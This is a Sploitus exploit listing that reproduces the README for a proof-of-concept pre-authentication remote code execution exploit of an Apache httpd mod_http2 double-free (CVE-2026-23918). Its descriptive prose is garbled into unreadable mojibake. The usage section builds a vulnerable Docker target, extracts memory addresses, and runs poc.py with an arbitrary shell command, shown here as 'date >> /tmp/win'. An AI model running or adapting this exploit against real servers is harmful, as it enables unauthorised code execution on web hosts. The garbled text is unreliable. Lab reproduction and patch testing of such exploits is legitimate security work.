Sploitus

Exploit for CVE-2026-23918

kitploit ┬╖ 2026-09-06

Exploit Code

MARKDOWN45 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-STRIGA-AI-CVE-2026-23918
# CVE-2026-23918

Apache httpd mod_http2 рд╕реНрдЯреНрд░реАрдо рдХреНрд▓реАрдирдЕрдк рдореЗрдВ рдбрдмрд▓-рдлреНрд░реА рдЬреЛ рдкреВрд░реНрд╡-рдкреНрд░рдорд╛рдгреАрдХрд░рдг RCE рдХреА рдУрд░ рд▓реЗ рдЬрд╛рддрд╛ рд╣реИред

рдкреНрд░рднрд╛рд╡рд┐рдд: httpd 2.4.66 рдЬрд┐рд╕рдореЗрдВ mod_http2 рдФрд░ рдорд▓реНрдЯреА-рдереНрд░реЗрдбреЗрдб MPM (event/worker) рд╣реИред рдареАрдХ рдХрд┐рдпрд╛ рдЧрдпрд╛: 2.4.67 рдореЗрдВред

рдкрд╛рдпрд╛ рдФрд░ рд░рд┐рдкреЛрд░реНрдЯ рдХрд┐рдпрд╛ Bartlomiej Dmitruk (striga.ai) рдФрд░ Stanislaw Strzalkowski (isec.pl) рдиреЗред

рд╡рд┐рд╡рд░рдг: https://striga.ai/research/apache-httpd-mod-http2-double-free

## рдЖрд╡рд╢реНрдпрдХрддрд╛рдПрдБ

  * Docker
  * Python 3



## рдЙрдкрдпреЛрдЧ

рдХрдордЬреЛрд░ рд╡рд╛рддрд╛рд╡рд░рдг рдмрдирд╛рдПрдБ рдФрд░ рдкреНрд░рд╛рд░рдВрдн рдХрд░реЗрдВ:

root@kitploit:~
    
    
    docker build -t httpd-poc .
    docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc
    

`system()` рдФрд░ scoreboard рдкрддреЗ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:

root@kitploit:~
    
    
    docker exec httpd-poc python3 /getaddr.py 1
    

рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдЪрд▓рд╛рдПрдБ:

root@kitploit:~
    
    
    python3 poc.py --host localhost --port 9443 \
        --cmd 'date >> /tmp/win' --workers 64 \
        --system <system_addr> --scoreboard <scoreboard_addr>